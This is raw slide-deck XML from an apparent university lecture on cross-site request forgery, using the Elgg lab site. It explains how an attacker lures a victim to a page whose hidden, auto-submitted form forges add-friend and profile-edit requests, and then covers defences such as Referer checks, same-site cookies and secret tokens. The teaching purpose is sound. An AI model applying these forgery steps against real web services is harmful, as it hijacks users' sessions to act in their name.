                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>folder).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6436328" y="1181293"/>
            <a:ext cx="2491800" cy="3247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Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The img tag will trigger an HTTP GET request. When browsers render a web page and sees an img tag, it sends an HTTP GET request to the URL specified in the src attribute.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2400"/>
              <a:t>Attract Victim to Visit Your Malicious Page</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p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87337" lvl="0" marL="287337" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy can send a private message to Alice with the link to the malicious web page.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-287337" lvl="0" marL="287337" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If Alice clicks the link, Samy’s malicious web page will be loaded into Alice’s browser and a forged add-friend request will be sent to the Elgg server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-287337" lvl="0" marL="287337" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On success, Samy will be added to Alice’s friend list.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2400"/>
              <a:t>Elgg’s Edit-Profile Service</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Google Shape;406;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="6471601" cy="2074050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6777175" y="1093375"/>
            <a:ext cx="2271900" cy="398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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> URL of the edit-profile service.</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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Session cookie (unique for each user). It is automatically set by browsers.</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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> CSRF countermeasures, which are disabled   </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="408" name="Google Shape;408;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3244176"/>
            <a:ext cx="6471600" cy="152738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2400"/>
              <a:t>Elgg’s Edit-Profile Service</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2813465"/>
            <a:ext cx="8520600" cy="2076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1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Description field with text “SAMY is MY HERO” (In encoded form)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Access level of each field : 2 means viewable by everyone</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>⑥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Id (GUID) of the victim. This can be obtained by visiting victim’s profile page source, looking for the following:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Elgg.page_owner={“guid”:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,”type”:”user”,...}</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415" name="Google Shape;415;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1151905"/>
            <a:ext cx="6471600" cy="152738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114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Craft the Malicious Web Page</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926900" y="1131205"/>
            <a:ext cx="3905400" cy="3879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The JavaScript function creates a hidden form with the description entry as our text.</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When the victim visits this page, the form will be automatically submitted (POST request) from the victim’s browser to the edit-profile service at “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.csrflabelgg.com/action/profile/edit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>” causing the message to be added to the victim’s profile.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;422;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="4622100" cy="361484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 sz="2970"/>
              <a:t>Fundamental Causes of CSRF</a:t>
            </a:r>
            <a:endParaRPr sz="2970"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p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31775" lvl="0" marL="231775" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The server cannot distinguish whether a request is cross-site or same-site</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Same-site request: coming from the server’s own page. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cross-site request: coming from other site’s pages. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not Trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We cannot treat these two types of requests the same.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="0" marL="231775" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Does the browser know the difference?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Of course. The browser knows from which page a request is generated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can browser help?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="0" marL="231775" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How to help server?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Referer header  (browser’s help)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Same-site cookie (browser’s help)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-231775" lvl="1" marL="574675" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Secret token (the server helps itself to defend against CSRF)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1"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p31"/>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Request-response Client-server model, typically over TCP/IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Client (e.g. browser): HTTP request using HTTP verbs such as get, post, put, delete..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Server (e.g. Apache server): HTTP reply with status code:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Informational 1XX, Successful 2XX, Redirection 3XX, Client Error 4XX and Server Error 5XX.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stateless: each http request is independent of each other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 sz="2400"/>
              <a:t>Countermeasures: Referer Header</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP header field identifying the address of the web page from where the request is generated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A server can check whether the request is originated from its own pages or not.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
